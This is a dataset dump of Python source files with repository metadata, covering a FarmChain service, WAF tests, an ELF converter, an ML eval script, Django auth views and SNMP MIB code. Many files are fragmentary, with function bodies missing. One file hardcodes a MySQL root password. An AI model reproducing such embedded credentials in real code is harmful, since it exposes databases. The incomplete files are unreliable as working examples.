hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 11 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 251 | max_stars_repo_name stringlengths 4 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 251 | max_issues_repo_name stringlengths 4 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 251 | max_forks_repo_name stringlengths 4 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.05M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.04M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c75d41f3ecd90250dc9544657aba89378f5765d0 | 2,150 | py | Python | services/UserService.py | erginbalta/FarmChain | a542d19212f176b7b5d12806078459da105e5afa | [
"Apache-2.0"
] | 1 | 2021-01-16T14:38:21.000Z | 2021-01-16T14:38:21.000Z | services/UserService.py | erginbalta/FarmChain | a542d19212f176b7b5d12806078459da105e5afa | [
"Apache-2.0"
] | null | null | null | services/UserService.py | erginbalta/FarmChain | a542d19212f176b7b5d12806078459da105e5afa | [
"Apache-2.0"
] | 1 | 2020-07-23T04:00:07.000Z | 2020-07-23T04:00:07.000Z | import mysql.connector
import socket
from contextlib import closing
import json
import random
packetType= ["INF","TRN","USR"]
database = mysql.connector.connect(
host="localhost",
user="root",
port="3307",
passwd="ergin00000",
database="farmchain"
)
| 26.875 | 119 | 0.676744 |
c75e39b34cd2c6335e68141ae306111fa4b684be | 10,238 | py | Python | tests/blackbox/access_settings/test_bb_access_settings.py | csanders-git/waflz | ec8fc7c845f20a2a8c757d13845ba22a6d7c5b28 | [
"Apache-2.0"
] | 1 | 2019-03-16T09:02:58.000Z | 2019-03-16T09:02:58.000Z | tests/blackbox/access_settings/test_bb_access_settings.py | csanders-git/waflz | ec8fc7c845f20a2a8c757d13845ba22a6d7c5b28 | [
"Apache-2.0"
] | null | null | null | tests/blackbox/access_settings/test_bb_access_settings.py | csanders-git/waflz | ec8fc7c845f20a2a8c757d13845ba22a6d7c5b28 | [
"Apache-2.0"
] | 1 | 2021-04-22T09:43:46.000Z | 2021-04-22T09:43:46.000Z | #!/usr/bin/python
'''Test WAF Access settings'''
#TODO: make so waflz_server only runs once and then can post to it
# ------------------------------------------------------------------------------
# Imports
# ------------------------------------------------------------------------------
import pytest
import subprocess
import os
import sys
import json
from pprint import pprint
import time
import requests
# ------------------------------------------------------------------------------
# Constants
# ------------------------------------------------------------------------------
G_TEST_HOST = 'http://127.0.0.1:12345/'
# ------------------------------------------------------------------------------
# globals
# ------------------------------------------------------------------------------
g_server_pid = -1
# ------------------------------------------------------------------------------
#
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
#setup_func
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
#teardown_func
# ------------------------------------------------------------------------------
def teardown_func():
global g_server_pid
time.sleep(.5)
print 'teardown g_server_pid: %d'%(g_server_pid)
if g_server_pid != -1:
l_code, l_out, l_err = run_command('kill -9 %d'%(g_server_pid))
time.sleep(.5)
# ------------------------------------------------------------------------------
# test_bb_modsecurity_ec_access_settings_ignore_args
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
# test_bb_modsec_ec_access_settings_02_bypass_in_ignore_args
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
# test_bb_modsec_ec_access_settings_03_block_headers_not_in_ignore_header_list
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
# test_bb_modsec_ec_access_settings_04_bypass_headers_in_ignore_header_list
# ------------------------------------------------------------------------------
# -------------------------------------------------------------------------------
# test_bb_modsec_ec_access_settings_05_bypass_headers_in_ignore_header_list_regex
# -------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
# test_bb_modsec_ec_access_settings_06_block_cookie_not_in_ignore_cookie_list
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
# test_bb_modsec_ec_access_settings_07_bypass_cookie_in_ignore_cookie_list
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
# test_bb_modsec_ec_access_settings_08_ignore_cookie_in_ignore_cookie_list
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
# test_bb_modsec_ec_access_settings_09_block_disallowed_http_method
# ------------------------------------------------------------------------------
| 49.458937 | 117 | 0.511428 |
c75ec65b0817a875da33fd517bd4f04f459ffba4 | 2,852 | py | Python | cosmosis/runtime/analytics.py | ktanidis2/Modified_CosmoSIS_for_galaxy_number_count_angular_power_spectra | 07e5d308c6a8641a369a3e0b8d13c4104988cd2b | [
"BSD-2-Clause"
] | 1 | 2021-09-15T10:10:26.000Z | 2021-09-15T10:10:26.000Z | cosmosis/runtime/analytics.py | ktanidis2/Modified_CosmoSIS_for_galaxy_number_count_angular_power_spectra | 07e5d308c6a8641a369a3e0b8d13c4104988cd2b | [
"BSD-2-Clause"
] | null | null | null | cosmosis/runtime/analytics.py | ktanidis2/Modified_CosmoSIS_for_galaxy_number_count_angular_power_spectra | 07e5d308c6a8641a369a3e0b8d13c4104988cd2b | [
"BSD-2-Clause"
] | 1 | 2021-06-11T15:29:43.000Z | 2021-06-11T15:29:43.000Z | #coding: utf-8
from __future__ import print_function
from builtins import zip
from builtins import object
from cosmosis import output as output_module
import numpy as np
import sys
import os
| 31.688889 | 73 | 0.543829 |
c76014b2a087d9f2456ffc8e8847fb9b397481a4 | 8,148 | py | Python | sdcc2elf.py | Vector35/llil_transpiler | 6f6f368d34cb872460ad1634ddcbc4207276feb6 | [
"MIT"
] | 14 | 2019-08-23T13:49:07.000Z | 2021-12-24T20:09:57.000Z | sdcc2elf.py | Vector35/llil_transpiler | 6f6f368d34cb872460ad1634ddcbc4207276feb6 | [
"MIT"
] | null | null | null | sdcc2elf.py | Vector35/llil_transpiler | 6f6f368d34cb872460ad1634ddcbc4207276feb6 | [
"MIT"
] | 1 | 2021-12-24T20:10:00.000Z | 2021-12-24T20:10:00.000Z | #!/usr/bin/env python
#
# convert SDCC .rel files to 32-bit ELF relocatable
#
# resulting file is simple:
#
# ------------------------
# ELF header
# ------------------------
# .text section
# .shstrtab section
# .strtab section
# .symtab section
# ------------------------
# NULL elf32_shdr
# .text elf32_shdr
# .shstrtab elf32_shdr
# .symtab elf32_shdr
# .strtab elf32_shdr
# ------------------------
import os
import re
import sys
from struct import pack
#------------------------------------------------------------------------------
# ELF helpers
#------------------------------------------------------------------------------
(PF_X, PF_W, PF_R) = (1,2,4)
(SHT_NULL, SHT_PROGBITS, SHT_STRTAB) = (0,1,3)
sz_ehdr = 0x34
sz_shdr = 0x28
#------------------------------------------------------------------------------
# read .map file for symbols
#------------------------------------------------------------------------------
fpath_map = sys.argv[2]
assert fpath_map.endswith('.map')
with open(fpath_map) as fp:
lines = fp.readlines()
(_CODE_ADDR, _CODE_SZ) = (None, None)
(i_code, i_header) = (None, None)
for (i, line) in enumerate(lines):
if line.startswith('_CODE'):
m = re.match(r'^_CODE\s+([A-F0-9]{8})\s+([A-F0-9]{8})', line)
(addr, size) = map(lambda x: int(x, 16), m.group(1,2))
if not i_code:
i_code = i
_CODE_ADDR = addr
_CODE_SZ = size
else:
if addr != _CODE_ADDR:
raise Exception('conflicting code segment addresses')
if size != _CODE_SZ:
raise Exception('conflicting code segment sizes')
if line.startswith('_HEADER0'):
i_header = i
break
assert i_code and i_header and i_code < i_header
syms = []
for line in lines[i_code:i_header]:
m = re.search(r'([A-F0-9]{8})\s+(_\w+)', line)
if m:
(addr, symname) = m.group(1, 2)
print('found %s: %s' % (addr, symname))
syms.append((symname, int(addr, 16)));
assert syms
print('_CODE [%08X, %08X)' % (_CODE_ADDR, _CODE_ADDR+_CODE_SZ))
print('_CODE symbols from')
for (name, addr) in syms:
print('%08X: %s' % (addr, name))
#------------------------------------------------------------------------------
# read .ihx file
#------------------------------------------------------------------------------
fpath_ihx = sys.argv[1]
assert fpath_ihx.endswith('.ihx')
code_area = [b'\x00'] * (_CODE_ADDR + _CODE_SZ)
with open(fpath_ihx) as fp:
for line in fp.readlines():
m = re.match(r'^:(..)(....)00(.*)(..)', line)
if m:
(count, addr, data, csum) = m.group(1,2,3,4)
count = int(count,16)
assert count == len(data)/2
addr = int(addr,16)
if not (addr >= _CODE_ADDR and addr < (_CODE_ADDR + _CODE_SZ)):
continue
print('%08X: ' % addr, end='')
for i in range(count):
byte_str = data[2*i]+data[2*i+1]
print('%s ' % byte_str, end='')
code_area[addr + i] = pack('B', int(byte_str, 16))
print('')
continue
m = re.match(r'^:00000001FF', line)
if m:
break
raise Exception('got unexpected IHX line: %s' % line)
assert code_area
#print(code_area)
#------------------------------------------------------------------------------
# write ELF
#------------------------------------------------------------------------------
# process symbols, build string table
syms = sorted(syms, key=lambda name_addr: name_addr[1])
func2size = {}
func2stroffs = {}
strtab = b'\x00'
for i in range(len(syms)):
(name, addr) = syms[i]
if i == len(syms)-1:
func2size[name] = len(code_area) - addr
else:
func2size[name] = syms[i+1][1] - addr
func2stroffs[name] = len(strtab)
strtab = strtab + name.encode('utf-8') + b'\x00'
print('%04X: %s size %X' % (addr, name, func2size[name]))
fp = open('tests.elf', 'wb')
# elf32_hdr (placeholder, we'll come back to fill in offsets)
print('elf32_hdr @ %X' % fp.tell())
fp.write(b'\x00' * sz_ehdr)
# .text section contents
o_text = fp.tell()
print('placing .text @ %X' % o_text)
for byte in code_area:
fp.write(byte)
sz_text = fp.tell() - o_text
# .shstrtab section contents
scn_shstrtab = b'\x00.text\x00.shstrtab\x00.symtab\x00.strtab\x00'
align(fp)
o_shstrtab = fp.tell()
print('placing .shstrtab @ %X' % o_shstrtab)
fp.write(scn_shstrtab)
sz_shstrtab = fp.tell() - o_shstrtab
# .symtab section contents
align(fp)
o_symtab = fp.tell()
print('placing .symtab @ %X' % o_symtab)
for (name, addr) in syms:
st_name = func2stroffs[name]
st_value = addr
st_size = func2size[name]
st_info = 0x12 # bind:1(GLOBAL) type:2(FUNC)
st_other = 0
st_shndx = 0x1 # section header index: 0'th: NULL 1'th: .text
Elf32_Sym = pack('<IIIBBH', st_name, st_value, st_size, st_info, st_other, st_shndx)
fp.write(Elf32_Sym)
sz_symtab = fp.tell() - o_symtab
# .strtab section contents
align(fp)
o_strtab = fp.tell()
print('placing .strtab @ %X' % o_strtab)
fp.write(strtab)
sz_strtab = fp.tell() - o_strtab
# null section header (index 0)
align(fp)
o_shdr_null = fp.tell()
print('placing shdr NULL @ %X' % o_shdr_null)
fp.write(b'\x00' * sz_shdr)
# .text section header (index 1)
o_shdr_text = fp.tell()
print('placing shdr .text @ %X' % fp.tell())
sh_name = scn_shstrtab.index(b'.text')
sh_type = 1 # SHT_PROGBITS
sh_flags = 6 # ALLOC|EXECINSTR
sh_addr = 0
sh_offset = o_text
sh_size = sz_text
sh_link = 0
sh_info = 0
sh_addralign = 4
sh_entsize = 0
tmp = pack('<IIIIIIIIII', \
sh_name, sh_type, sh_flags, sh_addr, sh_offset, sh_size, sh_link, sh_info, \
sh_addralign, sh_entsize)
fp.write(tmp)
# .shstrtab section header (index 2)
o_shdr_shstrtab = fp.tell()
print('placing shdr .shstrtab @ %X' % fp.tell())
sh_name = scn_shstrtab.index(b'.shstrtab')
sh_type = 3 #SHT_STRTAB
sh_flags = 0
sh_addr = 0
sh_offset = o_shstrtab
sh_size = sz_shstrtab
sh_link = 0
sh_info = 0
sh_addralign = 1
sh_entsize = 0
tmp = pack('<IIIIIIIIII', \
sh_name, sh_type, sh_flags, sh_addr, sh_offset, sh_size, sh_link, sh_info, \
sh_addralign, sh_entsize)
fp.write(tmp)
# .symtab section header (index 3)
o_shdr_symtab = fp.tell()
print('placing shdr .symtab @ %X' % fp.tell())
sh_name = scn_shstrtab.index(b'.symtab')
sh_type = 2 #SHT_SYMTAB
sh_flags = 0
sh_addr = 0
sh_offset = o_symtab
sh_size = sz_symtab
sh_link = 4 # link to scn #4 (find strings in .strtab)
sh_info = 0
sh_addralign = 4
sh_entsize = 0
tmp = pack('<IIIIIIIIII', \
sh_name, sh_type, sh_flags, sh_addr, sh_offset, sh_size, sh_link, sh_info, \
sh_addralign, sh_entsize)
fp.write(tmp)
# .strtab section header (index 4)
o_shdr_strtab = fp.tell()
print('placing shdr .strtab @ %X' % fp.tell())
sh_name = scn_shstrtab.index(b'.strtab')
sh_type = 3 #SHT_STRTAB
sh_flags = 0
sh_addr = 0
sh_offset = o_strtab
sh_size = sz_strtab
sh_link = 0
sh_info = 0
sh_addralign = 1
sh_entsize = 0
tmp = pack('<IIIIIIIIII', \
sh_name, sh_type, sh_flags, sh_addr, sh_offset, sh_size, sh_link, sh_info, \
sh_addralign, sh_entsize)
fp.write(tmp)
# seek back, write real elf header
hdr = b'\x7FELF'
hdr += b'\x01' # e_ident[EI_CLASS] 32-bit
hdr += b'\x01' # e_ident[EI_DATA] LSB (little-end)
hdr += b'\x01\x00\x00' # version, osabi, abiversion
hdr += b'\x00'*7
assert len(hdr) == 16
hdr += pack('<H', 1) # e_type = ET_REL
hdr += pack('<H', 220) # e_machine = EM_Z80
hdr += pack('<I', 1) # e_version = EV_CURRENT
hdr += pack('<I', 0) # e_entry
hdr += pack('<I', 0) # e_phoff
hdr += pack('<I', o_shdr_null) # e_shoff
hdr += pack('<I', 0) # e_flags
hdr += pack('<H', sz_ehdr) # e_ehsize
hdr += pack('<H', 0) # e_phentsize
hdr += pack('<H', 0) # e_phnum
hdr += pack('<H', sz_shdr) # e_shentsize
hdr += pack('<H', 5) # e_shnum
hdr += pack('<H', 2) # e_shstrndx = index of .shstrtab
assert len(hdr) == sz_ehdr
fp.seek(0, os.SEEK_SET)
fp.write(hdr)
# done!
fp.close()
| 27.714286 | 88 | 0.567624 |
c760d11b6bcb337986c7f02b8372675729e8a684 | 3,743 | py | Python | eval.py | nikinsta/deep-siamese-text-similarity-on-python-3 | 80fffd86da1d9f6bc0cb154a9415ff767d944777 | [
"MIT"
] | null | null | null | eval.py | nikinsta/deep-siamese-text-similarity-on-python-3 | 80fffd86da1d9f6bc0cb154a9415ff767d944777 | [
"MIT"
] | null | null | null | eval.py | nikinsta/deep-siamese-text-similarity-on-python-3 | 80fffd86da1d9f6bc0cb154a9415ff767d944777 | [
"MIT"
] | null | null | null | #! /usr/bin/env python
import tensorflow as tf
import numpy as np
import os
import time
import datetime
from tensorflow.contrib import learn
from input_helpers import InputHelper
# Parameters
# ==================================================
# Eval Parameters
tf.flags.DEFINE_integer("batch_size", 64, "Batch Size (default: 64)")
tf.flags.DEFINE_string("checkpoint_dir", "", "Checkpoint directory from training run")
tf.flags.DEFINE_string("eval_filepath", "match_valid.tsv", "Evaluate on this data (Default: None)")
tf.flags.DEFINE_string("vocab_filepath", "runs/1479874609/checkpoints/vocab", "Load training time vocabulary (Default: None)")
tf.flags.DEFINE_string("model", "runs/1479874609/checkpoints/model-32000", "Load trained model checkpoint (Default: None)")
# Misc Parameters
tf.flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement")
tf.flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices")
FLAGS = tf.flags.FLAGS
FLAGS._parse_flags()
print("\nParameters:")
for attr, value in sorted(FLAGS.__flags.items()):
print("{}={}".format(attr.upper(), value))
print("")
if FLAGS.eval_filepath==None or FLAGS.vocab_filepath==None or FLAGS.model==None :
print("Eval or Vocab filepaths are empty.")
exit()
# load data and map id-transform based on training time vocabulary
inpH = InputHelper()
x1_test,x2_test,y_test = inpH.getTestDataSet(FLAGS.eval_filepath, FLAGS.vocab_filepath, 30)
print("\nEvaluating...\n")
# Evaluation
# ==================================================
checkpoint_file = FLAGS.model
print(checkpoint_file)
graph = tf.Graph()
with graph.as_default():
session_conf = tf.ConfigProto(
allow_soft_placement=FLAGS.allow_soft_placement,
log_device_placement=FLAGS.log_device_placement)
sess = tf.Session(config=session_conf)
with sess.as_default():
# Load the saved meta graph and restore variables
saver = tf.train.import_meta_graph("{}.meta".format(checkpoint_file))
sess.run(tf.initialize_all_variables())
saver.restore(sess, checkpoint_file)
# Get the placeholders from the graph by name
input_x1 = graph.get_operation_by_name("input_x1").outputs[0]
input_x2 = graph.get_operation_by_name("input_x2").outputs[0]
input_y = graph.get_operation_by_name("input_y").outputs[0]
dropout_keep_prob = graph.get_operation_by_name("dropout_keep_prob").outputs[0]
# Tensors we want to evaluate
predictions = graph.get_operation_by_name("output/distance").outputs[0]
accuracy = graph.get_operation_by_name("accuracy/accuracy").outputs[0]
sim = graph.get_operation_by_name("accuracy/temp_sim").outputs[0]
#emb = graph.get_operation_by_name("embedding/W").outputs[0]
#embedded_chars = tf.nn.embedding_lookup(emb,input_x)
# Generate batches for one epoch
batches = inpH.batch_iter(list(zip(x1_test,x2_test,y_test)), 2*FLAGS.batch_size, 1, shuffle=False)
# Collect the predictions here
all_predictions = []
all_d=[]
for db in batches:
x1_dev_b,x2_dev_b,y_dev_b = zip(*db)
batch_predictions, batch_acc, sim = sess.run([predictions,accuracy,sim], {input_x1: x1_dev_b, input_x2: x2_dev_b, input_y:y_dev_b, dropout_keep_prob: 1.0})
all_predictions = np.concatenate([all_predictions, batch_predictions])
print(batch_predictions)
all_d = np.concatenate([all_d, sim])
print("DEV acc {}".format(batch_acc))
for ex in all_predictions:
print(ex)
correct_predictions = float(np.mean(all_d == y_test))
print("Accuracy: {:g}".format(correct_predictions))
| 42.05618 | 167 | 0.696767 |
c76173ed74a504071f1116fc3a7dc17a1c832c39 | 4,626 | py | Python | accounts/views.py | nikhiljohn10/django-auth | 01d97e8173436c3446f039cfa6472ece3cd9f96a | [
"MIT"
] | null | null | null | accounts/views.py | nikhiljohn10/django-auth | 01d97e8173436c3446f039cfa6472ece3cd9f96a | [
"MIT"
] | null | null | null | accounts/views.py | nikhiljohn10/django-auth | 01d97e8173436c3446f039cfa6472ece3cd9f96a | [
"MIT"
] | null | null | null | from django.urls import reverse
from django.conf import settings
from django.contrib import messages
from django.shortcuts import render, redirect
from django.core.mail import send_mail
from django.contrib.auth import login, logout, views, authenticate
from django.views.generic.edit import CreateView
from django.contrib.sessions.models import Session
from django.contrib.auth.decorators import login_required, permission_required
from accounts.tools import activater, mailer
from accounts.forms import SignUpForm, LoginForm
from accounts.models import User
class UserLogin(views.LoginView):
template_name = 'auth/login.html'
authentication_form = LoginForm
class SignUpView(CreateView):
form_class = SignUpForm
template_name = 'auth/signup.html'
def user_manage_permission(user, username):
if not user.is_staff:
if user.username == username:
return True
else:
if user.username != username:
return True
return False
user_login = UserLogin.as_view()
user_signup = SignUpView.as_view()
user_logout = views.LogoutView.as_view()
| 31.684932 | 78 | 0.671422 |
c7651286d18c5a48356115767024669710aad666 | 29 | py | Python | python/testData/intentions/PyAnnotateVariableTypeIntentionTest/annotationTupleType.py | truthiswill/intellij-community | fff88cfb0dc168eea18ecb745d3e5b93f57b0b95 | [
"Apache-2.0"
] | 2 | 2019-04-28T07:48:50.000Z | 2020-12-11T14:18:08.000Z | python/testData/intentions/PyAnnotateVariableTypeIntentionTest/annotationTupleType.py | truthiswill/intellij-community | fff88cfb0dc168eea18ecb745d3e5b93f57b0b95 | [
"Apache-2.0"
] | 173 | 2018-07-05T13:59:39.000Z | 2018-08-09T01:12:03.000Z | python/testData/intentions/PyAnnotateVariableTypeIntentionTest/annotationTupleType.py | truthiswill/intellij-community | fff88cfb0dc168eea18ecb745d3e5b93f57b0b95 | [
"Apache-2.0"
] | 2 | 2020-03-15T08:57:37.000Z | 2020-04-07T04:48:14.000Z | v<caret>ar = (1, 'foo', None) | 29 | 29 | 0.551724 |
c7655b5b6676c78858c562c5f53a9ea086d6bb5c | 228 | py | Python | bot/venv/lib/python3.7/site-packages/scipy/version.py | manaccac/sc2_bot | 3aa8b3711378b71fd0a44662cdd7148846e39530 | [
"MIT"
] | 76 | 2020-07-06T14:44:05.000Z | 2022-02-14T15:30:21.000Z | bot/venv/lib/python3.7/site-packages/scipy/version.py | manaccac/sc2_bot | 3aa8b3711378b71fd0a44662cdd7148846e39530 | [
"MIT"
] | 37 | 2020-10-20T08:30:53.000Z | 2020-12-22T13:15:45.000Z | bot/venv/lib/python3.7/site-packages/scipy/version.py | manaccac/sc2_bot | 3aa8b3711378b71fd0a44662cdd7148846e39530 | [
"MIT"
] | 15 | 2020-11-30T22:12:22.000Z | 2020-12-09T01:32:48.000Z |
# THIS FILE IS GENERATED FROM SCIPY SETUP.PY
short_version = '1.5.4'
version = '1.5.4'
full_version = '1.5.4'
git_revision = '19acfed431060aafaa963f7e530c95e70cd4b85c'
release = True
if not release:
version = full_version
| 20.727273 | 57 | 0.745614 |
c765b8fb3017f33809adece1e8c0d5771ccc24b7 | 356 | py | Python | emrichen/input/__init__.py | jbek7/emrichen | b6b8327e35cb2b9f3da49519110ecc766a9ad741 | [
"MIT"
] | null | null | null | emrichen/input/__init__.py | jbek7/emrichen | b6b8327e35cb2b9f3da49519110ecc766a9ad741 | [
"MIT"
] | null | null | null | emrichen/input/__init__.py | jbek7/emrichen | b6b8327e35cb2b9f3da49519110ecc766a9ad741 | [
"MIT"
] | null | null | null | from typing import TextIO, Union
from .json import load_json
from .yaml import load_yaml
PARSERS = {
'yaml': load_yaml,
'json': load_json,
}
| 20.941176 | 79 | 0.676966 |
c7675ba7953da5231174f58bf3d8e9f9039a7d72 | 5,668 | py | Python | sdk/python/pulumi_aws_native/workspaces/get_workspace.py | pulumi/pulumi-aws-native | 1ae4a4d9c2256b2a79ca536f8d8497b28d10e4c3 | [
"Apache-2.0"
] | 29 | 2021-09-30T19:32:07.000Z | 2022-03-22T21:06:08.000Z | sdk/python/pulumi_aws_native/workspaces/get_workspace.py | pulumi/pulumi-aws-native | 1ae4a4d9c2256b2a79ca536f8d8497b28d10e4c3 | [
"Apache-2.0"
] | 232 | 2021-09-30T19:26:26.000Z | 2022-03-31T23:22:06.000Z | sdk/python/pulumi_aws_native/workspaces/get_workspace.py | pulumi/pulumi-aws-native | 1ae4a4d9c2256b2a79ca536f8d8497b28d10e4c3 | [
"Apache-2.0"
] | 4 | 2021-11-10T19:42:01.000Z | 2022-02-05T10:15:49.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
__all__ = [
'GetWorkspaceResult',
'AwaitableGetWorkspaceResult',
'get_workspace',
'get_workspace_output',
]
def get_workspace(id: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetWorkspaceResult:
"""
Resource Type definition for AWS::WorkSpaces::Workspace
"""
__args__ = dict()
__args__['id'] = id
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('aws-native:workspaces:getWorkspace', __args__, opts=opts, typ=GetWorkspaceResult).value
return AwaitableGetWorkspaceResult(
bundle_id=__ret__.bundle_id,
directory_id=__ret__.directory_id,
id=__ret__.id,
root_volume_encryption_enabled=__ret__.root_volume_encryption_enabled,
tags=__ret__.tags,
user_volume_encryption_enabled=__ret__.user_volume_encryption_enabled,
volume_encryption_key=__ret__.volume_encryption_key,
workspace_properties=__ret__.workspace_properties)
| 41.985185 | 211 | 0.711009 |
c768daaabaf9920391bc3d2ee09b1a53e4d2788c | 24 | py | Python | testtools/__init__.py | afy2103/spambayes-9-10-Frozen | 383db71e3b7b2141975cf66e6d223bb437511776 | [
"PSF-2.0"
] | null | null | null | testtools/__init__.py | afy2103/spambayes-9-10-Frozen | 383db71e3b7b2141975cf66e6d223bb437511776 | [
"PSF-2.0"
] | null | null | null | testtools/__init__.py | afy2103/spambayes-9-10-Frozen | 383db71e3b7b2141975cf66e6d223bb437511776 | [
"PSF-2.0"
] | null | null | null | __author__ = 'AlexYang'
| 12 | 23 | 0.75 |
c768fa044e6b10f72fbfbfa85435ada393a83af3 | 673 | py | Python | tests/test_distance.py | mkclairhong/quail | a6d6502746c853518a670d542222eb5fc2b05542 | [
"MIT"
] | 1 | 2018-05-30T15:33:26.000Z | 2018-05-30T15:33:26.000Z | tests/test_distance.py | mkclairhong/quail | a6d6502746c853518a670d542222eb5fc2b05542 | [
"MIT"
] | null | null | null | tests/test_distance.py | mkclairhong/quail | a6d6502746c853518a670d542222eb5fc2b05542 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from quail.distance import *
import numpy as np
import pytest
from scipy.spatial.distance import cdist
| 21.03125 | 41 | 0.580981 |
c769abd3fe7f81479f81afe9e3156873d7f5b0e2 | 17,050 | py | Python | utils/manisfestManager.py | ovitrac/pizza3 | 0f4dc6e362fd8665c72ec13328df05f9119dfbc3 | [
"MIT"
] | 1 | 2022-02-07T14:10:10.000Z | 2022-02-07T14:10:10.000Z | utils/manisfestManager.py | ovitrac/Pizza3 | 0f4dc6e362fd8665c72ec13328df05f9119dfbc3 | [
"MIT"
] | null | null | null | utils/manisfestManager.py | ovitrac/Pizza3 | 0f4dc6e362fd8665c72ec13328df05f9119dfbc3 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
###############################################################################
# #
# manifestManager.py #
# #
# Work with online data manifests (creating / syncing / validating) #
# #
# Copyright (C) Michael Imelfort #
# #
###############################################################################
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
# #
###############################################################################
__author__ = "Michael Imelfort"
__copyright__ = "Copyright 2014"
__credits__ = ["Michael Imelfort"]
__license__ = "GPLv3"
__maintainer__ = "Michael Imelfort"
__email__ = "mike@mikeimelfort.com"
__version__ = "0.35"
###############################################################################
###############################################################################
###############################################################################
###############################################################################
__MANIFEST__ = ".dmanifest"
###############################################################################
###############################################################################
###############################################################################
###############################################################################
# system includes
import os
import hashlib
import urllib.request, urllib.error, urllib.parse
import urllib.request, urllib.parse, urllib.error
import shutil
import errno
# local includes
from fileEntity import FileEntity as FE
###############################################################################
###############################################################################
###############################################################################
###############################################################################
###############################################################################
###############################################################################
###############################################################################
###############################################################################
# %% DEBUG
# ===================================================
# main()
# ===================================================
# for debugging purposes (code called as a script)
# the code is called from here
# ===================================================
if __name__ == '__main__':
man = ManifestManager()
man.createManifest("/home/olivi/billy/python",manifestName="Pizza3.manifest") | 44.285714 | 130 | 0.436716 |
c76b9236e24c24d26fa468bcec0fccac39b536c2 | 27,999 | py | Python | pysnmp/ZYXEL-AclV2-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 11 | 2021-02-02T16:27:16.000Z | 2021-08-31T06:22:49.000Z | pysnmp/ZYXEL-AclV2-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 75 | 2021-02-24T17:30:31.000Z | 2021-12-08T00:01:18.000Z | pysnmp/ZYXEL-AclV2-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module ZYXEL-AclV2-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/ZYXEL-AclV2-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 21:43:03 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, Integer, OctetString = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "Integer", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ConstraintsUnion, SingleValueConstraint, ConstraintsIntersection, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ConstraintsUnion", "SingleValueConstraint", "ConstraintsIntersection", "ValueRangeConstraint")
InetAddress, = mibBuilder.importSymbols("INET-ADDRESS-MIB", "InetAddress")
EnabledStatus, = mibBuilder.importSymbols("P-BRIDGE-MIB", "EnabledStatus")
PortList, = mibBuilder.importSymbols("Q-BRIDGE-MIB", "PortList")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
